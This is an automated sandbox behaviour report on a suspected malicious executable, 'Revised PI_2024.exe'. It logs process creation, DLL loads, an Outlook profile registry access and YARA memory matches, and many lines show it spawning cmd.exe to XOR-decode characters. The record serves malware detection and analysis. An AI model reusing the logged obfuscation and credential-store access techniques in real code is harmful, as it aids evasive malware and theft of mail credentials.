            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Users\user\Desktop\Revised PI_2024.exe "C:\Users\user\Desktop\Revised PI_2024.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Revised PI_2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.82257067560.000000000511A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.82255738297.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.82255738297.0000000000514000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Revised PI_2024.exe PID: 5984, type: MEMORYSTR
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
            Source: C:\Users\user\Desktop\Revised PI_2024.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
